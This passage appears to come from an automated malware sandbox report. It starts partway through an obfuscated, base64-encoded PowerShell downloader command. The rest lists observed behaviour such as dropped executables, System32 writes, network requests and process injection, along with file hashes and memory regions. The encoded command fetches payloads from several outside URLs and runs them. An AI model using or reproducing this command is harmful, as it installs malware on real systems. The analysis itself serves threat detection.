AnACsAJwAuAGMAbwAnACkAKwAoACcAbQAnACsAJwBbACAAdQAnACsAJwBOAEgAcwAnACkAKwAoACcAIABdAGgAJwArACcAbwB3ACcAKQArACgAJwAtAG0AJwArACcAdQBjACcAKQArACcAaAAnACsAKAAnAFsAJwArACcAIAB1ACcAKQArACgAJwBOACcAKwAnAEgAcwAgACcAKQArACgAJwBdACcAKwAnAHoAdwAnACkAKwAnADIAJwArACcAegBbACcAKwAnACAAdQAnACsAKAAnAE4ASABzACcAKwAnACAAXQAnACsAJwBAAGgAdAB0ACcAKQArACgAJwBwADoAWwAnACsAJwAgAHUATgBIAHMAJwArACcAIABdACcAKQArACgAJwBbACAAdQAnACsAJwBOAEgAJwArACcAcwAgAF0AcAAnACsAJwBlAHIAJwArACcAcwBvACcAKQArACgAJwBuAGEAbAAnACsAJwBpACcAKQArACgAJwB6AGUAZAAnACsAJwBqACcAKQArACcAaQBnACcAKwAnAHMAYQAnACsAKAAnAHcAJwArACcAcwAuAGMAbwBtAFsAJwApACsAKAAnACAAJwArACcAdQBOAEgAJwApACsAJwBzACcAKwAoACcAIABdAHIAZQAnACsAJwBwAGwAYQBjACcAKwAnAGUAXwBpACcAKwAnAG0AZwAnACkAKwAoACcAWwAgAHUAJwArACcATgBIACcAKwAnAHMAIAAnACkAKwAoACcAXQBxAEcANgBEACcAKwAnADkAJwApACsAJwBUACcAKwAnAFsAJwArACcAIAB1ACcAKwAnAE4AJwArACgAJwBIAHMAIABdAEAAJwArACcAaAAnACkAKwAoACcAdAB0AHAAOgAnACsAJwBbACAAJwArACcAdQBOAEgAcwAgACcAKQArACgAJwBdAFsAJwArACcAIAB1AE4AJwApACsAKAAnAEgAcwAnACsAJwAgAF0AJwApACsAJwBzACcAKwAoACcAdABhAGIAJwArACcAcgBpACcAKQArACgAJwAtACcAKwAnAHQAaABhAGkAJwApACsAKAAnAGwAJwArACcAYQBuACcAKQArACgAJwBkAC4AbwByACcAKwAnAGcAWwAnACkAKwAnACAAJwArACgAJwB1AE4AJwArACcASAAnACkAKwAoACcAcwAgACcAKwAnAF0AYwBnAGkALQBiAGkAJwArACcAbgAnACkAKwAoACcAWwAgAHUAJwArACcATgBIAHMAJwArACcAIAAnACsAJwBdADEAJwApACsAJwBHAEsAJwArACcASQBbACcAKwAoACcAIAB1AE4ASAAnACsAJwBzACAAXQBAACcAKwAnAGgAJwArACcAdAAnACkAKwAnAHQAJwArACgAJwBwADoAJwArACcAWwAnACkAKwAoACcAIAB1AE4AJwArACcASABzACAAJwApACsAKAAnAF0AWwAnACsAJwAgAHUAJwApACsAJwBOAEgAJwArACcAcwAnACsAKAAnACAAJwArACcAXQBvAGQAJwApACsAJwBtAG8AJwArACgAJwB2ACcAKwAnAGEAJwArACcALgBwAGwAWwAgACcAKwAnAHUATgBIAHMAJwArACcAIABdAHIAJwApACsAKAAnAGUAdAAnACsAJwByAGEAJwApACsAKAAnAG4AcwBsACcAKwAnAGEAJwApACsAKAAnAHQAZQAnACsAJwBbACAAJwApACsAJwB1ACcAKwAoACcATgAnACsAJwBIAHMAJwApACsAJwAgAF0AJwArACgAJwBPAHEATABkAHIAeQBbACcAKwAnACAAJwArACcAdQBOAEgAcwAgACcAKQArACcAXQAnACkALgAiAFIARQBwAGwAYABBAEMAZQAiACgAKAAoACcAWwAgACcAKwAnAHUATgBIACcAKQArACcAcwAgACcAKwAnAF0AJwApACwAKABbAGEAcgByAGEAeQBdACgAJwAvACcAKQAsACcAZgBzACcAKQBbADAAXQApAC4AIgBTAFAAYABsAGkAdAAiACgAJABRAGIAZgBzAG4AMQB3ACAAKwAgACQAUwBsAGYAMAA3AHQAZgAgACsAIAAkAFMAOABfAHkAdQA1AHQAKQA7ACQASgBiAHAAdwBqAGsANAA9ACgAKAAnAFoAMQAnACsAJwBrAHcAJwApACsAJwBfAHgAJwArACcANAAnACkAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFkAegAwAHkAMQAyADcAIABpAG4AIAAkAFgAdgBtADkAZwBvAHkAKQB7AHQAcgB5AHsAJABYAHgAdwBrADIANgB6AC4AIgBkAGAATwB3AGAATgBsAG8AQQBkAGYAaQBsAGUAIgAoACQAWQB6ADAAeQAxADIANwAsACAAJABJAG4AbQA0AHQAeAAwACkAOwAkAEkANwBzADgAcwByAGYAPQAoACcAUAAnACsAKAAnAG0AJwArACcAegB1ADMAbgBiACcAKQApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQB0ACcAKwAnAGUAbQAnACkAIAAkAEkAbgBtADQAdAB4ADAAKQAuACIATABlAG4AYABHAFQASAAiACAALQBnAGUAIAA0ADIANAA5ADgAKQAgAHsAKABbAHcAbQBpAGMAbABhAHMAcwBdACgAKAAnAHcAJwArACcAaQBuADMAMgAnACkAKwAoACcAXwAnACsAJwBQAHIAbwBjAGUAJwArACcAcwAnACkAKwAnAHMAJwApACkALgAiAEMAUgBgAGUAYQBUAGUAIgAoACQASQBuAG0ANAB0AHgAMAApADsAJABKADcANQBxADkAawBtAD0AKAAnAEsAcwAnACsAKAAnAHkAcABhACcAKwAnAGIAJwApACsAJwBjACcAKQA7AGIAcgBlAGEAawA7ACQATwBsAHkAbQB3ADgANwA9ACgAKAAnAEUAJwArACcAXwA5ACcAKQArACgAJwB3AGoAJwArACcAMAAnACkAKwAnAHcAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABSAHIAdwAyAF8AMABwAD0AKAAnAEUAJwArACcAeQAnACsAKAAnAGQAJwArACcAMABzADUAdwAnACkAKQA=1⤵
- Process spawned unexpected child process
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exeC:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exe1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tbs\batmeter.exe"C:\Windows\SysWOW64\tbs\batmeter.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exeMD5
8d1cae4e7c6d2d234a74b39708ba1e74
SHA1e90eb1c1b573b2d0d1a5dc49e45befc7cf3ce49a
SHA25637ba2708fea2f95868f0af1e162aedc90acb0326cf3a013fc760d5c4ea67adee
SHA5127fd4bba03c6f085ade9e043f03a57d6efc689ec2a6f0d45fff75096c38008d3d3832806152fd2970451a956e39af4f59e75124861892e489feedec55249672e1
-
C:\Users\Admin\Ts0ns8c\Q6s4bbf\Ekkzsyr.exeMD5
8d1cae4e7c6d2d234a74b39708ba1e74
SHA1e90eb1c1b573b2d0d1a5dc49e45befc7cf3ce49a
SHA25637ba2708fea2f95868f0af1e162aedc90acb0326cf3a013fc760d5c4ea67adee
SHA5127fd4bba03c6f085ade9e043f03a57d6efc689ec2a6f0d45fff75096c38008d3d3832806152fd2970451a956e39af4f59e75124861892e489feedec55249672e1
-
C:\Windows\SysWOW64\tbs\batmeter.exeMD5
8d1cae4e7c6d2d234a74b39708ba1e74
SHA1e90eb1c1b573b2d0d1a5dc49e45befc7cf3ce49a
SHA25637ba2708fea2f95868f0af1e162aedc90acb0326cf3a013fc760d5c4ea67adee
SHA5127fd4bba03c6f085ade9e043f03a57d6efc689ec2a6f0d45fff75096c38008d3d3832806152fd2970451a956e39af4f59e75124861892e489feedec55249672e1
-
memory/856-12-0x0000000001FB0000-0x0000000001FE3000-memory.dmpFilesize
204KB
-
memory/856-13-0x0000000001FF0000-0x0000000002021000-memory.dmpFilesize
196KB
-
memory/1036-1-0x0000000006210000-0x0000000006214000-memory.dmpFilesize
16KB
-
memory/1036-2-0x000000000065A000-0x000000000065E000-memory.dmpFilesize
16KB
-
memory/1036-3-0x000000000065A000-0x000000000065E000-memory.dmpFilesize
16KB
-
memory/1036-0-0x0000000000658000-0x000000000065A000-memory.dmpFilesize
8KB
-
memory/1116-18-0x0000000001E20000-0x0000000001E51000-memory.dmpFilesize
196KB
-
memory/1116-15-0x0000000000000000-mapping.dmp
-
memory/1116-17-0x0000000000580000-0x00000000005B3000-memory.dmpFilesize
204KB
-
memory/1496-19-0x000007FEF7020000-0x000007FEF729A000-memory.dmpFilesize
2.5MB
-
memory/1668-5-0x0000000002530000-0x0000000002531000-memory.dmpFilesize
4KB
-
memory/1668-10-0x000000001B970000-0x000000001B971000-memory.dmpFilesize
4KB
-
memory/1668-9-0x000000001B8A0000-0x000000001B8A1000-memory.dmpFilesize
4KB
-
memory/1668-8-0x0000000002370000-0x0000000002371000-memory.dmpFilesize
4KB
-
memory/1668-7-0x0000000002410000-0x0000000002411000-memory.dmpFilesize
4KB
-
memory/1668-6-0x000000001AA20000-0x000000001AA21000-memory.dmpFilesize
4KB
-
memory/1668-4-0x000007FEF6160000-0x000007FEF6B4C000-memory.dmpFilesize
9.9MB